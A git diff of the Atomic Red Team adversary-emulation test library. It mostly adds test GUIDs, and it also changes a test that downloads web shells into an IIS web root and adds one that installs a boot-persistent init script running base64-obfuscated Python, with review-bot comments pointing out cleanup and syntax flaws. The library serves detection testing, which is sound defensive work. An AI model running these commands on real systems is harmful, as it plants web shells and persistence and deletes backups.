@@ -101,6 +109,10 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa
**Supported Platforms:** Windows
+**auto_generated_guid:** 263ba6cb-ea2b-41c9-9d4e-b652dadd002c
+
+
+
@@ -126,6 +138,10 @@ Upon execution, "The operation completed successfully." will be displayed in the
**Supported Platforms:** Windows
+**auto_generated_guid:** cf21060a-80b3-4238-a595-22525de4ab81
+
+
+
@@ -159,6 +175,10 @@ there may be no output displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 39a295ca-7059-4a88-86f6-09556c1211e7
+
+
+
@@ -184,6 +204,10 @@ to delete files from around the system.
**Supported Platforms:** Windows
+**auto_generated_guid:** 6b1dbaf6-cc8a-4ea6-891f-6058569653bf
+
+
+
@@ -208,6 +232,10 @@ Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used
**Supported Platforms:** Windows
+**auto_generated_guid:** 584331dd-75bc-4c02-9e0b-17f5fd81c748
+
+
+
diff --git a/atomics/T1491.001/T1491.001.md b/atomics/T1491.001/T1491.001.md
index ff394927..805913fa 100644
--- a/atomics/T1491.001/T1491.001.md
+++ b/atomics/T1491.001/T1491.001.md
@@ -15,10 +15,14 @@ Downloads an image from a URL and sets it as the desktop wallpaper.
**Supported Platforms:** Windows
+**auto_generated_guid:** 30558d53-9d76-41c4-9267-a7bd5184bed3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url_of_wallpaper | URL pointing to the image file you wish to set as wallpaper | url | https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png|
| pointer_to_orginal_wallpaper | Full path to where a file containing the original wallpaper location will be saved | String | $env:TEMP\T1491.001-OrginalWallpaperLocation|
diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md
index 39645569..23067507 100644
--- a/atomics/T1496/T1496.md
+++ b/atomics/T1496/T1496.md
@@ -20,6 +20,10 @@ End the test by using CTRL/CMD+C to break.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 904a5a0e-fb02-490d-9f8d-0e256eb37549
+
+
+
diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md
index 055376e4..f7cf9555 100644
--- a/atomics/T1497.001/T1497.001.md
+++ b/atomics/T1497.001/T1497.001.md
@@ -28,6 +28,10 @@ At boot, dmesg stores a log if a hypervisor is detected.
**Supported Platforms:** Linux
+**auto_generated_guid:** dfbd1a21-540d-4574-9731-e852bd6fe840
+
+
+
@@ -52,6 +56,10 @@ Windows Management Instrumentation(WMI) objects contains system information whic
**Supported Platforms:** Windows
+**auto_generated_guid:** 502a7dc4-9d6f-4d28-abf2-f0e84692562d
+
+
+
@@ -82,6 +90,10 @@ ioreg contains registry entries for all the device drivers in the system. If it'
**Supported Platforms:** macOS
+**auto_generated_guid:** a960185f-aef6-4547-8350-d1ce16680d09
+
+
+
diff --git a/atomics/T1505.002/T1505.002.md b/atomics/T1505.002/T1505.002.md
index 974d261b..e5ad87a3 100644
--- a/atomics/T1505.002/T1505.002.md
+++ b/atomics/T1505.002/T1505.002.md
@@ -18,10 +18,14 @@ More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchang
**Supported Platforms:** Windows
+**auto_generated_guid:** 43e92449-ff60-46e9-83a3-1a38089df94d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| class_factory | Class factory of transport agent. | string | Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory|
| dll_path | Path of DLL to use as transport agent. | path | c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll|
@@ -52,7 +56,7 @@ if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){
##### Description: Microsoft Exchange SnapIn must be installed
##### Check Prereq Commands:
```powershell
-Get-TransportAgent -TransportService FrontEnd
+Get-TransportAgent -TransportService FrontEnd
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md
index 5749d721..83933c8d 100644
--- a/atomics/T1505.003/T1505.003.md
+++ b/atomics/T1505.003/T1505.003.md
@@ -19,10 +19,14 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
**Supported Platforms:** Windows
+**auto_generated_guid:** 0a2ce662-1efa-496f-a472-2fe7b080db16
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
| web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1505.003\src\|
@@ -32,12 +36,14 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
```cmd
-xcopy #{web_shells} #{web_shell_path}
+xcopy /I /Y #{web_shells} #{web_shell_path}
```
#### Cleanup Commands:
```cmd
-del #{web_shell_path} /q >nul 2>&1
+del #{web_shell_path}\b.jsp /q >nul 2>&1
+del #{web_shell_path}\tests.jsp /q >nul 2>&1
+del #{web_shell_path}\cmd.aspx /q >nul 2>&1
```
@@ -46,13 +52,13 @@ del #{web_shell_path} /q >nul 2>&1
##### Description: Web shell must exist on disk at specified location (#{web_shells})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{web_shells}) {exit 0} else {exit 1}
+if (Test-Path #{web_shells}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
```
diff --git a/atomics/T1505.003/T1505.003.yaml b/atomics/T1505.003/T1505.003.yaml
index bc9476b0..066dafd1 100644
--- a/atomics/T1505.003/T1505.003.yaml
+++ b/atomics/T1505.003/T1505.003.yaml
@@ -27,12 +27,14 @@ atomic_tests:
get_prereq_command: |
New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
executor:
command: |
- xcopy #{web_shells} #{web_shell_path}
+ xcopy /I /Y #{web_shells} #{web_shell_path}
cleanup_command: |
- del #{web_shell_path} /q >nul 2>&1
+ del #{web_shell_path}\b.jsp /q >nul 2>&1
+ del #{web_shell_path}\tests.jsp /q >nul 2>&1
+ del #{web_shell_path}\cmd.aspx /q >nul 2>&1
name: command_prompt
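Review bot: The new cleanup_command deletes exactly three named files, while the command a few lines above copies everything under `#{web_shells}` with `xcopy /I /Y`, so any other file present in that directory is copied into `#{web_shell_path}` (the IIS web root by default) and survives cleanup — a leftover web shell is the worst residue a test can leave behind. Either copy only the three named files or derive the deletion list from the same directory xcopy read, e.g. (constructed, check the percent escaping for this executor — `%%f` inside a batch file) `for %f in ("#{web_shells}*") do del "#{web_shell_path}\%~nxf" /q >nul 2>&1`. The `>nul 2>&1` on each `del` also hides failures, so a cleanup that did not actually remove a shell reports nothing; consider leaving stderr visible for the cleanup lines. The same change is mirrored in the T1505.003.md hunk above.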
diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md
index 774a3286..97c326fc 100644
--- a/atomics/T1518.001/T1518.001.md
+++ b/atomics/T1518.001/T1518.001.md
@@ -32,6 +32,10 @@ and specific security software.
**Supported Platforms:** Windows
+**auto_generated_guid:** f92a380f-ced9-491f-b338-95a991418ce2
+
+
+
@@ -63,6 +67,10 @@ when sucessfully executed, powershell is going to processes related AV products
**Supported Platforms:** Windows
+**auto_generated_guid:** 7f566051-f033-49fb-89de-b6bacab730f0
+
+
+
@@ -91,6 +99,10 @@ when sucessfully executed, command shell is going to display AV/Security softwa
**Supported Platforms:** macOS
+**auto_generated_guid:** ba62ce11-e820-485f-9c17-6f3c857cd840
+
+
+
@@ -116,6 +128,10 @@ when sucessfully executed, command shell is going to display AV/Security softwa
**Supported Platforms:** Linux
+**auto_generated_guid:** 23b91cd2-c99c-4002-9e41-317c63e024a2
+
+
+
@@ -142,6 +158,10 @@ when sucessfully executed, the test is going to display sysmon driver instance i
**Supported Platforms:** Windows
+**auto_generated_guid:** fe613cf3-8009-4446-9a0f-bc78a15b66c9
+
+
+
@@ -168,6 +188,10 @@ when sucessfully executed, the test is going to display installed AV software.
**Supported Platforms:** Windows
+**auto_generated_guid:** 1553252f-14ea-4d3b-8a08-d7a4211aa945
+
+
+
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 7925bb5f..796e4ffc 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -22,6 +22,10 @@ Upon execution, version information about internet explorer will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** 68981660-6670-47ee-a5fa-7e74806420a4
+
+
+
@@ -47,6 +51,10 @@ software name and version information will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
+
+
+
@@ -72,6 +80,10 @@ Adversaries may attempt to get a listing of non-security related software that i
**Supported Platforms:** macOS
+**auto_generated_guid:** 103d6533-fd2a-4d08-976a-4a598565280f
+
+
+
diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md
index 15aa0390..13cf9b66 100644
--- a/atomics/T1529/T1529.md
+++ b/atomics/T1529/T1529.md
@@ -33,10 +33,14 @@ This test shuts down a Windows system.
**Supported Platforms:** Windows
+**auto_generated_guid:** ad254fa8-45c0-403b-8c77-e00b3d3e7a64
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| timeout | Timeout period before shutdown (seconds) | string | 1|
@@ -62,10 +66,14 @@ This test restarts a Windows system.
**Supported Platforms:** Windows
+**auto_generated_guid:** f4648f0d-bf78-483c-bafc-3ec99cd1c302
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| timeout | Timeout period before restart (seconds) | string | 1|
@@ -91,10 +99,14 @@ This test restarts a macOS/Linux system.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 6326dbc4-444b-4c04-88f4-27e94d0327cb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| timeout | Time to restart (can be minutes or specific time) | string | now|
@@ -120,10 +132,14 @@ This test shuts down a macOS/Linux system using a halt.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 4963a81e-a3ad-4f02-adda-812343b351de
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| timeout | Time to shutdown (can be minutes or specific time) | string | now|
@@ -149,6 +165,10 @@ This test restarts a macOS/Linux system via `reboot`.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 47d0b042-a918-40ab-8cf9-150ffe919027
+
+
+
@@ -173,6 +193,10 @@ This test shuts down a Linux system using `halt`.
**Supported Platforms:** Linux
+**auto_generated_guid:** 918f70ab-e1ef-49ff-bc57-b27021df84dd
+
+
+
@@ -197,6 +221,10 @@ This test restarts a Linux system using `halt`.
**Supported Platforms:** Linux
+**auto_generated_guid:** 78f92e14-f1e9-4446-b3e9-f1b921f2459e
+
+
+
@@ -221,6 +249,10 @@ This test shuts down a Linux system using `poweroff`.
**Supported Platforms:** Linux
+**auto_generated_guid:** 73a90cd2-48a2-4ac5-8594-2af35fa909fa
+
+
+
@@ -245,6 +277,10 @@ This test restarts a Linux system using `poweroff`.
**Supported Platforms:** Linux
+**auto_generated_guid:** 61303105-ff60-427b-999e-efb90b314e41
+
+
+
diff --git a/atomics/T1531/T1531.md b/atomics/T1531/T1531.md
index 025c33ba..0e5483e1 100644
--- a/atomics/T1531/T1531.md
+++ b/atomics/T1531/T1531.md
@@ -22,10 +22,14 @@ the password "HuHuHUHoHo283283".
**Supported Platforms:** Windows
+**auto_generated_guid:** 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_account | User account whose password will be changed. | string | AtomicAdministrator|
| new_user_password | Password to use if user account must be created first | string | User2ChangePW!|
@@ -58,10 +62,14 @@ Deletes a user account to prevent access. Upon execution, run the command "net u
**Supported Platforms:** Windows
+**auto_generated_guid:** f21a1d7d-a62f-442a-8c3a-2440d43b19e5
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_user_password | Password to use if user account must be created first | string | User2DeletePW!|
| user_account | User account to be deleted. | string | AtomicUser|
@@ -89,10 +97,14 @@ This test will remove an account from the domain admins group
**Supported Platforms:** Windows
+**auto_generated_guid:** 43f71395-6c37-498e-ab17-897d814a0947
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| super_user | Account used to run the execution command (must include domain). | string | domain\super_user|
| super_pass | super_user account password. | string | password|
@@ -119,7 +131,7 @@ if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Ad
##### Description: Requires the Active Directory module for powershell to be installed.
##### Check Prereq Commands:
```powershell
-if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1543.001/T1543.001.md b/atomics/T1543.001/T1543.001.md
index 9eecc4dd..5f572f48 100644
--- a/atomics/T1543.001/T1543.001.md
+++ b/atomics/T1543.001/T1543.001.md
@@ -17,10 +17,14 @@ Create a plist and execute it
**Supported Platforms:** macOS
+**auto_generated_guid:** a5983dee-bf6c-4eaf-951c-dbc1a7b90900
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| plist_filename | filename | string | com.atomicredteam.plist|
| path_malicious_plist | Name of file to store in cron folder | string | $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist|
@@ -42,7 +46,7 @@ sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist})
##### Check Prereq Commands:
```bash
-if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
+if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md
index c9bfec54..7e10bdf0 100644
--- a/atomics/T1543.002/T1543.002.md
+++ b/atomics/T1543.002/T1543.002.md
@@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni
- [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service)
+- [Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-file--enable-the-service--modify-and-reload-the-service)
+
@@ -25,10 +27,14 @@ This test creates a Systemd service unit file and enables it as a service.
**Supported Platforms:** Linux
+**auto_generated_guid:** d9e4f24f-aa67-4c6e-bcbf-85622b697a7c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
| systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
@@ -75,4 +81,71 @@ systemctl daemon-reload
+
+
+
+## Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service.
+This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** c35ac4a8-19de-43af-b9f8-755da7e89c89
+
+
+
+
+
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+
+```bash
+cat > /etc/init.d/T1543.002 << EOF
+#!/bin/bash
+### BEGIN INIT INFO
+# Provides : Atomic Test T1543.002
+# Required-Start: $all
+# Required-Stop :
+# Default-Start: 2 3 4 5
+# Default-Stop:
+# Short Description: Atomic Test for Systemd Service Creation
+### END INIT INFO
+python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
+EOF
+
+chmod +x /etc/init.d/T1543.002
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
+systemctl enable T1543.002
+systemctl start T1543.002
+
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
+systemctl daemon-reload
+systemctl restart T1543.002
+```
+
+#### Cleanup Commands:
+```bash
+systemctl stop T1543.002
+systemctl disable T1543.002
+rm -rf /etc/init.d/T1543.002
+systemctl daemon-reload
+```
+
+
+
+#### Dependencies: Run with `bash`!
+##### Description: System must be Ubuntu ,Kali OR CentOS.
+##### Check Prereq Commands:
+```bash
+if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi;
+```
+##### Get Prereq Commands:
+```bash
+echo Please run from Ubuntu ,Kali OR CentOS.
+```
+
+
+
+
diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml
index 8b0a1de2..393c59b4 100644
--- a/atomics/T1543.002/T1543.002.yaml
+++ b/atomics/T1543.002/T1543.002.yaml
@@ -66,3 +66,49 @@ atomic_tests:
systemctl daemon-reload
name: bash
+
+- name: Create Systemd Service file, Enable the service , Modify and Reload the service.
+ auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+ description: |
+ This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
+
+ supported_platforms:
+ - linux
+ dependencies:
+ - description: |
+ System must be Ubuntu ,Kali OR CentOS.
+ prereq_command: |
+ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi;
+ get_prereq_command: |
+ echo Please run from Ubuntu ,Kali OR CentOS.
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ cat > /etc/init.d/T1543.002 << EOF
+ #!/bin/bash
+ ### BEGIN INIT INFO
+ # Provides : Atomic Test T1543.002
+ # Required-Start: $all
+ # Required-Stop :
+ # Default-Start: 2 3 4 5
+ # Default-Stop:
+ # Short Description: Atomic Test for Systemd Service Creation
+ ### END INIT INFO
+ python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
+ EOF
+
+ chmod +x /etc/init.d/T1543.002
+ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
+ systemctl enable T1543.002
+ systemctl start T1543.002
+
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
+ systemctl daemon-reload
+ systemctl restart T1543.002
+ cleanup_command: |
+ systemctl stop T1543.002
+ systemctl disable T1543.002
+ rm -rf /etc/init.d/T1543.002
+ systemctl daemon-reload
+
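Review bot: The `prereq_command` ends its branches with `exit /b 0` and `exit /b 1`, which is cmd.exe syntax; under the `bash` executor `exit /b` fails with a numeric-argument error and a non-zero status on both branches, so the dependency check can never report success even on Ubuntu, Kali or CentOS — it should read `then exit 0; else exit 1; fi;`. In `command`, the unquoted heredoc `cat > /etc/init.d/T1543.002 << EOF` lets the shell expand `$all` on the `# Required-Start:` line, so the LSB header is written without it; quote the delimiter as `<< 'EOF'`. What the test installs is a SysV init script in /etc/init.d registered via update-rc.d/chkconfig (picked up by systemd only through its sysv generator), not a systemd unit as the name and description claim, and it should be documented as such. The `sudo tee -a` step is inconsistent with `elevation_required: true` when the rest of the command already runs as root, `rm -rf` on a single file should be `rm -f`, and the rendered T1543.002.md hunk above mirrors all of this.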
diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md
index 7dfa0832..7044982f 100644
--- a/atomics/T1543.003/T1543.003.md
+++ b/atomics/T1543.003/T1543.003.md
@@ -27,6 +27,10 @@ Upon successful execution, cmd will modify the binpath for `Fax` to spawn powers
**Supported Platforms:** Windows
+**auto_generated_guid:** ed366cde-7d12-49df-a833-671904770b9f
+
+
+
@@ -57,10 +61,14 @@ Upon successful execution, powershell will download `AtomicService.exe` from git
**Supported Platforms:** Windows
+**auto_generated_guid:** 981e2942-e433-44e9-afc1-8c957a1496b6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService_CMD|
@@ -86,7 +94,7 @@ sc.exe delete #{service_name} >nul 2>&1
##### Description: Service binary must exist on disk at specified location (#{binary_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+if (Test-Path #{binary_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -107,10 +115,14 @@ Upon successful execution, powershell will download `AtomicService.exe` from git
**Supported Platforms:** Windows
+**auto_generated_guid:** 491a4af6-a521-4b74-b23b-f7b3f1ee9e77
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe|
| service_name | Name of the Service | String | AtomicTestService_PowerShell|
@@ -137,7 +149,7 @@ catch {}
##### Description: Service binary must exist on disk at specified location (#{binary_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+if (Test-Path #{binary_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md
index cae1c5d4..d3aaeda3 100644
--- a/atomics/T1543.004/T1543.004.md
+++ b/atomics/T1543.004/T1543.004.md
@@ -19,10 +19,14 @@ Utilize LaunchDaemon to launch `Hello World`
**Supported Platforms:** macOS
+**auto_generated_guid:** 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| plist_filename | filename | string | com.atomicredteam.plist|
| path_malicious_plist | Name of file to store in cron folder | string | $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist|
@@ -43,7 +47,7 @@ sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist})
##### Check Prereq Commands:
```bash
-if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
+if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
diff --git a/atomics/T1546.001/T1546.001.md b/atomics/T1546.001/T1546.001.md
index 14d91955..afb4141e 100644
--- a/atomics/T1546.001/T1546.001.md
+++ b/atomics/T1546.001/T1546.001.md
@@ -24,10 +24,14 @@ Upon successful execution, cmd.exe will change the file association of .hta to n
**Supported Platforms:** Windows
+**auto_generated_guid:** 10a08978-2045-4d62-8c42-1957bbbea102
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_extension_handler | txtfile maps to notepad.exe | Path | txtfile|
| extension_to_change | File Extension To Hijack | String | .hta|
diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md
index 0677ca63..4e2640aa 100644
--- a/atomics/T1546.002/T1546.002.md
+++ b/atomics/T1546.002/T1546.002.md
@@ -24,10 +24,14 @@ This test copies a binary into the Windows System32 folder and sets it as the sc
**Supported Platforms:** Windows
+**auto_generated_guid:** 281201e7-de41-4dc9-b73d-f288938cbb64
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe|
diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md
index 8ea3551c..7bf968e5 100644
--- a/atomics/T1546.003/T1546.003.md
+++ b/atomics/T1546.003/T1546.003.md
@@ -26,6 +26,10 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
+**auto_generated_guid:** 3c64f177-28e2-49eb-a799-d767b24dd1e0
+
+
+
diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md
index e45a0307..4299c29d 100644
--- a/atomics/T1546.004/T1546.004.md
+++ b/atomics/T1546.004/T1546.004.md
@@ -21,10 +21,14 @@ Adds a command to the .bash_profile file of the current user
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 94500ae1-7e31-47e3-886b-c328da46872f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py|
@@ -50,10 +54,14 @@ Adds a command to the .bashrc file of the current user
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 0a898315-4cfa-4007-bafe-33a4646d115f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_add | Command to add to the .bashrc file | string | /path/to/script.py|
diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md
index fc801714..8520cfbd 100644
--- a/atomics/T1546.005/T1546.005.md
+++ b/atomics/T1546.005/T1546.005.md
@@ -18,6 +18,10 @@ After sending a keyboard interrupt (CTRL+C) the script will download and execute
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** a74b2e07-5952-4c03-8b56-56274b076b61
+
+
+
diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md
index fb98bab9..04622979 100644
--- a/atomics/T1546.007/T1546.007.md
+++ b/atomics/T1546.007/T1546.007.md
@@ -17,10 +17,14 @@ Netsh interacts with other operating system components using dynamic-link librar
**Supported Platforms:** Windows
+**auto_generated_guid:** 3244697d-5a3a-4dfc-941c-550f69f91a4d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| helper_file | Path to DLL | Path | C:\Path\file.dll|
diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md
index e36b7357..735d996a 100644
--- a/atomics/T1546.008/T1546.008.md
+++ b/atomics/T1546.008/T1546.008.md
